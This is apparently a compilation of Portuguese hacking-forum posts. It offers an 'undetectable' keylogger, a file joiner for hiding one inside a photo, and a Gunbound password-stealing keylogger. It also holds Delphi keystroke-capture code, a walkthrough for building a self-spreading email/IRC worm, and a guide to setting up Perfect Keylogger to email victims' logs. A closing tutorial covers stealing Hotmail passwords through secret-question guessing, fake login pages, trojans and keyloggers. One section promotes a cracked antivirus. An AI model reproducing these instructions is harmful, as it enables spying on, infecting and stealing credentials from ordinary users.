Revisando, o que é um Keylogger?

Quais os tipos de Keyloggers?

Nos últimos dias começou a surgir no perfil de vários utilizadores do Facebook uma nova caixa de pesquisa que poderá ter aparecido como resultado de uma infecção do browser

O alerta é feito pelo blogue AllFacebook, especializado na rede social, onde os seus autores referem o surgimento de uma segunda caixa de pesquisa, ao lado da original.

O Facebook já negou a existência de uma segunda caixa de pesquisa, que segundo as imagens disponibilizadas pelo blogue indica que servirá para pesquisar na Internet, adiantando que não está a testar qualquer novo sistema de pesquisa no site, nem pretende lançá-lo no futuro.

Em comunicado a rede social defende que «o segundo campo de pesquisa, ou caixa Search the Web , aparece nas contas de pessoas como resultado de acções desconhecidas efectuadas por terceiros contra o browser, possivelmente um plugin ou malware, sem qualquer relação com o Facebook».

Fonte: sol.sapo.pt

Ola tudo blz??? Fiz mais um keylogger agora nessa versão o servidor e criado apartir do cliente do keylogger você já pode escolher o tempo de envio, desativar o firewall do Windows etc. segue algumas imagens lembrando até o momento (20/02/09) esta indetectável então não usem scanonline o keylogger esta auto-implicativo e muito fácil de usar

Olá,
Eis aqui um programa joiner utilizado para unir arquivos:

Join155

Como Usar:

Após fazer o Download extraia o arquivo;

Abra a pasta do arquivo e execute joiner.exe;

Em first executable você coloca o arquivo executável;

Em second File coloque outro arquivo que irá abrir junto com o executável;

Ex: vamos supor que em first executable eu coloquei o .exe de um keylogger e em second file uma foto.
Ao executar, o arquivo .exe instala e a foto abre.

Agora para finalizar clique em Join e de Ok.

Irá gerar um arquivo.exe na pasta do programa com o nome de Result.exe esse é o nosso arquivo que contém o .exe e a foto.

Execute para testar.

Abraço!

Créditos: H3nr1qu3.

Amigos,

Por pedidos fiz esse keylogger exclusivo para o jogo Gunbound.

Descrição:
Envia as senhas por formulário php.
Copia o servidor para a pasta do jogo original.
Open Source.
Indetectável.
Mini Tutorial dentro do Editor.

Imagem do Editor:

Imagem do Servidor:

Programa:

Source:

Senha para extrair: www.invasao.com.br

Créditos: B4silisco.

Ola,

Fiz esse tutorial para que todos entendam o código do keylogger e como ele funciona.
Vamos lá vou usar de exemplo o código mais conhecido que usa a função coloca.

Analisando a função do código:

function Coloca(txt: String): String;
begin
Form1.Memo1.Text := Form1.Memo1.Text + txt;
end;

Bem o que ela realmente faz é adicionar uma string txt no memo1.

Como usar

Adicione um memo e um timer e coloque a função em baixo de implementation.

No timer coloque:
(‘Esse teste é da função’);

O que ele vai fazer é chamar a função e ela vai adicionar o que está entre os ‘ ‘ no memo.

Entendendo o código de captura:



var
keyloop, KeyResult : Integer;
begin
keyloop := 0;
repeat
KeyResult := GetAsyncKeyState(keyloop);
if KeyResult = -32767 then
begin
case keyloop of
8: Coloca(‘ [BACKSPACE] ‘);
9: Coloca(‘ [TAB] ‘);
12: Coloca(‘ [ALT] ‘);
13: Coloca(‘ [ENTER] ‘);
16: Coloca(‘ [SHIFT] ‘);
17: Coloca(‘ [CONTROL] ‘);
18: Coloca(‘ [ALT] ‘);
20: Coloca(‘ [CAPS LOCK] ‘);
…

O que o código vai fazer é o keyloop vai pegar a variável e atribuir um valor a ela.
Cada tecla tem o seu valor Decimal ex: Valor Decimal da Tecla Tab é 9 , ele vai converter o valor decimal e vai atribuir o nome que foi colocado entre os ‘ ‘ .

Obs: Não esqueçam de colocar o timer com intervalo 1.

No fim do Tutorial fiz um txt onde contem vários valores decimais de teclas para que vocês podem estar ai criando os seus keyloggers e o código completo de captura.

É isso pessoal espero que tenham gostado e entendido como funciona o keylogger.

By: B4silisco.

http://www.b4silisco.xpg.com.br/Decimais.txt

http://www.b4silisco.xpg.com.br/codigo-captura.txt

Clique aqui para ler mais e comentar essa Matéria!

Olá pessoal, nesse tutorial eu vou mostrar como criar um worm.
Usarei o VBswg 2, que pode ser baixado aqui!

Após ter feito o download, abra o programa…Será exibido um janela, nela clique em IAGREE:

Logo em seguia aparecerá o Splash screen do programa e depois o programa:

Agora com o programa aberto vamos configurar nome do worm, para onde ele vai ser copiado, qual sera a extenção e etc…
• Em Worm name vc bota o nome do seu worm.
• Em You name vc pode botar seu nome, apelido ou outra coisa…
• Em File name vc repete o nome do seu worm.
• Em Copy worm to vc bota o diretório para onde seu worm será copiado.
• Por ultimo vc escolhe e extenção do seu worm, veja a imagem:

Agora clique no botão Startup

Abrirá um janelinha, nessa janelinha marque a opção Start with windows e clique em Done. Isso serve para que seu worm se inicie junto com o windows:

Agora, clique em no botão E-mail que está ao lado do botão Startup. Aqui o Worm envia um e-mail para todos os contatos da vítima infectada, então fica a seu gosto a mensagen.

Em seguida clique em Done

Agora clique em Irc que fica ao lado do botão E-mail, nessa janela configure como a imagem!

Isso serve para infectar todos os arquivo do Mirc ( Se a vítima usar.) Clique em Done em seguida!

Clique agora em Infect quando a janelinha abrir, marque todas as opçoes e clique em Done. Essas opções servem para que quando o seu worm for executado, infecte todos os tipos de arquivos da vítima.

Clique agora em Payload, caso queira que o seu worm de uma mensagem, ou abra uma página na internet e etc… assim que for executado, marque a opção Use payload caso contrário clique em Done. Eu optei por exibir mensagem, abrir site e etc. Então vamos ver como fazer:

• Em Message vc bota a mensagem que será exibida assim que for executado.
• Em Tittle vc bota o título da sua mensagem.
• Em Picture vc bota o tipo de mensagem que será exibida.

Vamos à legenda da mensagem:

-» Critical – Exibe mensagem do Tipo Erro
-» Information – Exibe mensagem do tipo Informação
-» Question – Exibe mensagem do tipo Fazendo um pergunta
-» Alert – Exibe uma mensagem do tipo Alertendo

• Em Goto Url vc bota a página da web que será exibida assim que seu worm for executado.
• Em Shut down ele reinicia o PC assim que for executado.
• Em Random nem precisa mecher!
• Em Date é o dia que seu worm se manifestará

Agora clique em Extra e depois em Antideletion, será exibida uma janelinha, nela marque as 2 opções e clique em Done. Isso serve para que seu worm não seja deletado do PC da vítima.

Clique em Extra novamente e sem seguida clique em Encryption, quando a janela for exibida marque as opções Use encryption e Full code encryption em sequida clique em Done. Isso serve para encryptar seu worm.

Após ter clicado em Done clique em Generate

Após ter clicado em Generate, aparecerá a seguinte janela:

Então clique em I AGREE

Agora clique em Create:

Em seguida é só botar o nome do seu worm e salvar.

Após isso, será exibida a seguinte mensagem, de OK nela!

Pronto, Worm Criado !! Agora é só mandar para alguem e zaz ;D

Tutorial por THiaG04EveR 

Clique aqui para comentar esse Tutorial

Tutorial Completo – Instalando e Configurando Perfect Keylogger

Observação A parte da instalação não tera fotos, pois é bem simples.

1º Tela -> Avançar

2º Tela -> Clickar em “Yes” do lado direito da tela e logo após avançar

3º Tela -> Avançar

4º Tela -> minimize a tela e va ateh C: e crie uma pasta vazia e logo após maximize a tela de instalação e clicke em “Change” va até a pasta que vc criou e de “Ok” e Logo após avançar

5º Tela -> Avançar

6º Tela -> desmarque a opção ” View Launch ” e logo após clicke em “Avançar”

Abrira uma tela para o registro do PERFECT KEY LOGGER. No download feito aqui Pelo Serial.

Pronto … Keylogger instalado e registrado

Configurando e criando um “Server” para a vitima

Repare bem que aparecera um icone na barra de tarefas que no caso é o do nosso KeyLogger:

agora vamos clickar neste icone e logo após “Options”. Abrirá a seguinte tela:

configure do jeito que mostra a imagem ..

agora vamos para a opção do lado esquerdo “Logging”

Antes de mais nada vamos adicionE uma senha para o KeyLogger pois quando vc mandar o server para a vitima e ela chegar a descobrir ai a Pode prejudicar voce pois ela vai poder abrir o KeyLogger e ver o email inclusive a senha etc. É claro que vc naum deve colocar seu email verdadeiro na Hora e de configurar o PK.

Bom no meu caso eu so marquei as opções “Enable chat Login” e “Monitor only onlire activity…”

Primeiramente vamos configurar o a opção “Scheduler”

observem a imagem …

na primeira opção “Try to send logs by e-mail every” eu coloquei 30 minutos, porem vc pode por o tempo que quiser. Eu acho que depende tambem de quantas pessoas voce vai mandar o KeyLogger. No caso 30 minutos eu so vou mandar meu KeyLogger para uma pessoa.
o resto é so deixar como mostra a imagem.

Agora vamos la na opção “Delivery”do lado de “Scheduler”

Para evitar que o LOG seje corretamente enviado ao seu e-mail crie um e-mail da
@itelefonica.com.br que sempre deu certo

apos ter feito o email vamos configuralo no kl e vamos colocar o smtp
SMTP.ITELEFONICA.COM.BR

Tudos certinho como mostra a imagem e mandamos o teste clickando em “Send Test “

se deu essa mensagem igual a imagem, Succesfully

Agora vamos configurar o “Server” para infectar a Vitima.

Vá até o icone do Keylogger na barra de tarefas .. Direito do mouse em Remote installation

Logo Após abrira a seguinte tela e siga os passos.

como mostra na imagem 3 eu estou juntando o keylogger com algum arquivo que vai servir para desfarçar … no caso se vc quer juntar basta clickar em procurar e selecionar o seu arquivo.

logo embaixo devemos escrever o caminho em que o seu server sera instalado .. no caso eu coloquei em C:\WINDOWS\SYSTEM

Caso vc queira que o seu server se auto-exclua na maquina da vitima ative a opção “Automatically unistall remote Keylogger after” e do lado voce coloca o tempo que auto-exclua no PC do infectado

De avançar

CONCLUIDO agora é so usar a Criatividade

Espero que gostem eu tinha esse tutorial enterrado em meu PC e resolvi postar ele

Tutorial por HellConective

Clique aqui para comentar esse Tutorial

1º: Baixe esses arquivos Bankerfix / HijackThis

2º: Crie e Copie esses arquivos para C:\HijackThis (criando a pasta HijackThis).

3º: Execute o Hijackthis e procure as linhas

O4 – HKLM\..\Run: [MsnMsgs] C:\WINDOWS\system\Win24DLL.exe;
O7 – HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1;

depois de selecionalas clique em “Fix Checked”

4º: Pronto agora você ja pode entrar em Iniciar>Executar e digitar regedit
Clique em Ctrl+F e digite “DisableCMD” apos localizar delete;

5º: Sem sair do Regedit – Clique em Ctrl+F novamente e digite “DisableTaskmgr”

6º: Saia de tudo e inicie o Bankerfix – Espere pois vai demorar um pouco. Clique em OK. Pois apos isso ele irá remover os vírus!

7º: Reinicie e aprecie pois voce está livre dele.

OBS: RECOMENDO O USO DO NOD32 3.0 e o A-Squared Free

Instalação do NOD32 3.0

1. Baixe o Arquivo e deszipe logo apos clique no executavel do nod32 “NOD32_Business_setup”
2. Sem reiniciar instale o Fix1.1
3. Reinicie e de Update apos isso reinicie novamente..!
4. Pronto tens Antivirus ate 5 de Janeiro de 2050.

Obrigado.

Bom galera, resolvi fazer esse tutorial pois muita gente me procura para perguntar isso.

Para esse tutorial, vamos usar o Hotmail como Exemplo, mas todas as técnicas utilizadas aqui podem ser usadas para qualquer email e algumas até para o Orkut. É bom você saber que ninguém descobre a senha de um hotmail invadindo o servidor de email deles não.

Existe várias maneiras de se roubar/descobrir a senha de um Hotmail, vamos listar cada uma delas.

1º Método: Seja um Engenheiro Social

» Pergunta Secreta

Essa é a forma mais simples de se Roubar a senha de um Hotmail. Acho ultrapassado, mas tem muita gente que ainda consegue. Usando esse método, quanto mais você conhecer a vítima, melhor.

Bom, o que fazer? Entre em www.hotmail.com e clique em “esqueceu sua senha?”

Complete o processo de redefinição de senha normalmente e clique em Continuar.

Selecione “Usar minhas informações de localização e minha resposta secreta para verificar minha identidade” e aparecerá a imagem seguinte.

Agora é que entra seu conhecimento sobre a Vítima, você vai tentar acertar a resposta para a Pergunta Secreta, como fazer isso?

Você pode descobrir isso de duas maneiras, uma é lendo o orkut da vítima INTEIRO, lá pode ter a resposta para a pergunta, se não tiver… adicione a vítima no MSN e utilize de Engenharia Social, conhecida lábia, até arrancar a resposta da vítima.

Caso você acerte a pergunta, você está com o email da vítima nas mãos, aparecerá uma nova página pedindo a nova senha, igual a quando criamos o email.

» Página Falsa

Um método ainda muito utilizado hoje, e que muitos caem é a Fake Page, em português: Página Falsa

Consiste em “clonar” a página de login do email cujo a vítima usa. Essa página pode ser o Hotmail, o Yahoo, o Orkut, ou até mesmo a página de Login de um jogo.

Você vai usar de Engenharia Social (mais uma vez) e fazer a vítima logar nessa página falsa. Quando ela logar, vai redirecionar para verdadeira página dando a idéia que ocorreu um “bug” ao logar, mas na verdade o login e senha foi enviado para o seu email.

Segue um tutorial do Fvox de fazer uma Página Falsa pelo FrontPage
http://www.forum-invasao.com.br/novo/viewtopic.php?t=13374

Procurando no Fórum ou no Google você poderá saber mais sobre Páginas Falsas.

2º Método: Capturando senha usando Programas

» Trojans

Um método simples que dar certo em muitos casos, é mandar um Trojan para vítima, onde você não apenas rouba sua senha mas obtém acesso completo ao computador. Arranje um Trojan indetectável pelos antivírus ou proteja um sever detectavel para deixa-lo indetectavel.

Mande para vítima, faça ela executar (usando Engenharia Social) e invada, ative a captura do que ele tecla e aguarde ela entrar no email que você quer roubar. Para adiantar o processo, você pode fazer inumeras coisas pra ele acessar o email, tais como:

• Mandar um email pra ele e diz pra ele ir lá ver
• Fazer ele cair do MSN e forçando-o a redigitar a senha

Ahh, isso vai depender da sua criatividade.

Keyloggers

Um keylogger, como um nome já diz, serve para capturar o que é digitado no teclado, você vai fazer a mesma coisa que fez com o trojan, mandar e fazer a vítima executar, dependendo do Keylogger, você pode ver o log na sua tela ao vivo quando você quiser, ou o log pode ser enviado por email.

Para fazer isso você vai precisar de um keylogger bom e indetectável, sugiro o Ardamax 2.9. (Clique aqui para ver o Tutorial do Ardamax Keylogger)

Se fizer tudo certo, é só esperar algum tempo e a senha vem pra você, você pode usar Engenharia Social para encurtar esse tempo.

PS: Se você for programador, melhor ainda, pois você irá fazer seus próprios Malwares, tendo mais chance assim de obter sucesso, pois com 95% de certeza, seu Malware vai está indetectavel dependendo da lógica que você usou.

Meus tutoriais sempre estarão abertos a críticas. Se acha que devo implementar/tirar/alterar alguma coisa, entre em contato comigo e mostre suas argumentações.

Clique aqui para comentar esse Tutorial